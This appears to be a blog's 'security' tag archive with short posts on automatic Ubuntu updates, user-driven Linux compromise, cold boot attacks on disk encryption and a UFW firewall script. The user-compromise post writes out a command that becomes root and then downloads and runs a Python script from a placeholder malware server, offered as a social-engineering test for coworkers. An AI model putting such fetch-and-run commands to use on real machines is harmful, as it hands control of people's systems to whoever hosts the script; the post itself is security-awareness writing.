Tag Archives: security

Auto update for Debian/Ubuntu

I use the following script to automatically update my Ubuntu box.
I don’t recommend using this on your production servers!

Note that there are some dangers regarding automatic updates. You can read more about it here.

How to write a linux virus

After reading an interesting article about linux “viruses” (the comments are interersing, too), I decided to raise the alarm about the source of many security related issues
in today’s computers: the user.
The author talks about the many ways to compromise a linux box, even if you are not root.
I will not get into techinal methods, you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t belive me? Make a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– put them to open terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Think about that every one of us knows a person like that.
It’s not a hard thing to make the user click on a link or run a command.
The attackers just have to find ways to extract informations from the compromised box.
In the end of the article, the author talks about solutions to this problem.

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.

In conclusion, there are no bullet-proof systems, only users who are too careless and click every link in their’s mouse way.

Cold Boot Attacks on Encryption Keys

Some guys at Princeton University published the results of their attacks on popular disk encryption systems (BitLocker, FileVault, dm-crypt, and TrueCrypt) using no special devices or materials.
Find out more about their research here and here.

Sample firewall script for Ubuntu

I just thought that you might be interested in a small script you can use in Hardy Heron.

It uses the new UFW (Uncomplicated firewall) introduced in this new Ubuntu distro.

The script is well commented, so everything is easy to understand.

Here is the script:

You can modify it by adding/removing rules accordingly.